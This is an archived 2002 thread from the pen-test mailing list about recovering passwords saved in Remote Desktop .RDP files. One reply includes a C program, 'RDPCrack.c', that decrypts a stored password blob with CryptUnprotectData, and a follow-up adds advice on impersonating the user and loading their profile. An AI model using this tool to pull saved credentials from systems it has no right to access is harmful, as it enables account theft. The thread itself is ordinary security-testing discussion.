RE: Saved Terminal Server Sessions
From: Michael Howard (mikehow@microsoft.com)
Date: 12/31/02
- Previous message: Nicolas RUFF: "Re: Saved Terminal Server Sessions"
- Maybe in reply to: st0ff st0ff: "Saved Terminal Server Sessions"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Tue, 31 Dec 2002 11:31:34 -0800 From: "Michael Howard" <mikehow@microsoft.com> To: "Nicolas RUFF" <nicolas.ruff@edelweb.fr>, "pen-test" <pen-test@securityfocus.com>
You will also need to load the user's profile, simply impersonating may
not work...
Cheers, Michael
Secure Windows Initiative
Writing Secure Code 2nd Edition
http://www.microsoft.com/mspress/books/5957.asp
-----Original Message-----
From: Nicolas RUFF [mailto:nicolas.ruff@edelweb.fr]
Sent: Tuesday, December 31, 2002 2:03 AM
To: pen-test
st0ff st0ff wrote:
> Hi all -
> Terminal Server Client or Remote Desktop Client are
> providing to save the appropriate user credentials. A
> plaintext file is used for that. But the password is
> encrypted in there. Is there a tool available to crack
> this?
Hi,
I guess you are talking about ".RDP" files. The password is encrypted
using the CryptProtectData() standard API. You can use the code below
(from MSDN), to decrypt it ; however you will have to impersonate the
user somehow to make this code run, because the encryption key used is
derivated from the user context (the Windows logon password I guess).
- Nicolas RUFF
-----------------------------------
Security Consultant @ EdelWeb
nicolas.ruff@edelweb.fr
-----------------------------------
//--------------------------------------------------------------------
// RDPCrack.c
//
// This is modified sample code from MSDN // This code requires Windows
2000 or XP // Don't forget to link CRYPT32.LIB //
#include <stdio.h>
#include <windows.h>
#include <wincrypt.h>
void HandleError(char *s);
void main()
{
DATA_BLOB DataOut;
DATA_BLOB DataVerify;
LPWSTR pDescrOut = NULL;
BYTE *pbDataOutput;
DWORD cbDataOutput;
int data;
// Put encrypted password string here
char szEncodedPwd[] =
"01000000D08C9DDF0115D1118C7A00C04FC297EB01000000A5C6A9949D6D804898C5037
8542C8AE40000000008000000700073007700000003660000A8000000100000008038592
82E66C6AFF273047E0D9C1D8A0000000004800000A000000010000000E60DE7216CBEC1F
108E86A1A21D7CDA1080200009878C213C72E84F0777A4D9E0B3F339906618C3F07727A7
9E1E1E923FCF50B3C5514246AD4117ADCFD4CF603AD5EEDA2A1692AFB4CAF32FEE468B6E
6C564FAADFC64E901CE784CA72081DF762B15D498F2C2488F9AAFC271B5B7D1DA2A4AA0B
585605024BCC18141213E6C9CBF3FCB1E2F032693580E63589D4342C8038E289F179147A
A85B06462E35F6C2E83C29BCA2EDACC754F76A3D7DAA666EDF5D615036BAE280211B602D
3F931F7AC22C26D5B3C1E7360757FE4CBAF3D5BAD23F1F06A6572F79A81552600E7F4453
5935F3908B6642E382D19FD7072C87174EF4144FA724368827DB7ACAA412242FDC215059
5A43974FF5C3BA18CE764F46C2F783740A6C250FC5F9350A09804C0E776BFE6B9D10F60E
219FC078F02E13F90DD9730FC598EBABE4AAB75C5C64D3A51BB0CC90470AAB85A921384C
929012A60A68BC893D3AA320032836B40D43637789724C2DE79217DA3BA7E77544489049
97DAFBB308EAD210ED51FAF1F8C5ABD6B057F728AE1F836974A1D
58017821C804EB2B1DB3897F7F31247CA55377379F1B05D69F2BDEAC5BE5BFD95E754F4A
69D2301222C72AE2200200092E56C69F66E15913E13B821CA78BEA70DC8CA2F682EFE01E
69B52E6218FE5FB5FAFF0DA7E17257748F1B35F0E3507D7A13146CBDFF6155FEE6B8CEF2
F5CFF1E0D66D0B5D7C4234E07D23319BA1C6317C0CDAA9A80499DD4B57A66886A677E631
744714000000257F2ED4678E73B1D0CF2338B471F6A507A7FE9F0";
// String conversion
cbDataOutput = ( (strlen(szEncodedPwd)) / 2 ); pbDataOutput = (BYTE
*)malloc( cbDataOutput + 1 ); if (pbDataOutput == NULL) HandleError("Not
enough memory.");
for (unsigned int i=0; i<(cbDataOutput); i++) {
sscanf(&(szEncodedPwd[i+i]), "%02x", &data);
pbDataOutput[i] = data;
}
DataOut.pbData = pbDataOutput;
DataOut.cbData = cbDataOutput;
// Decryption
if (CryptUnprotectData(
&DataOut, // [in] Input data
&pDescrOut, // (Optional) [out] Description string
NULL, // (Optional) [in] Entropy (not used by MS)
NULL, // Reserved
NULL, // (Optional) PromptStruct
0, // Flags
&DataVerify)) // [out] Output data
{
wprintf(L"The decrypted data is: %s\n", (WCHAR
*)DataVerify.pbData);
printf("The description of the data was: %S\n", pDescrOut); } else
{
HandleError("Decryption error!");
}
LocalFree(pDescrOut);
free(DataOut.pbData);
LocalFree(DataVerify.pbData);
}
void HandleError(char *s)
{
fprintf(stderr, "An error occurred in running the program. \n");
fprintf(stderr, "%s\n",s);
fprintf(stderr, "Error number %x.\n", GetLastError());
fprintf(stderr, "Program terminating. \n");
exit(1);
}
------------------------------------------------------------------------
---- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/ ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
- Previous message: Nicolas RUFF: "Re: Saved Terminal Server Sessions"
- Maybe in reply to: st0ff st0ff: "Saved Terminal Server Sessions"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
